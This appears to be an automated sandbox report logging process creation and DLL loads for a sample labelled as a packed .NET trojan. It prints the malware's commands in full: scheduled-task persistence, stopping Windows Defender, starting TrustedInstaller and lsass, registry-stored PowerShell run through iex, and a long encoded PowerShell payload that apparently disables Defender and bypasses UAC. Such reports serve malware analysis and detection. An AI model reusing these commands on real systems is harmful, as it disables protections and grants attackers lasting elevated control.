Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Client.exe "C:\Users\user\AppData\Local\Temp\Client.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\Infected.exe "C:\Users\user\AppData\Local\Temp\Infected.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process created: C:\Users\user\AppData\Local\Temp\WinDefend.exe "C:\Users\user\AppData\Local\Temp\WinDefend.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loaader.exe "C:\Users\user\AppData\Roaming\Loaader.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Loader.exe "C:\Users\user\AppData\Roaming\Loader.exe"
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21\Volatile ToggleDefender -ea 0)[0].ToggleDefender)}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
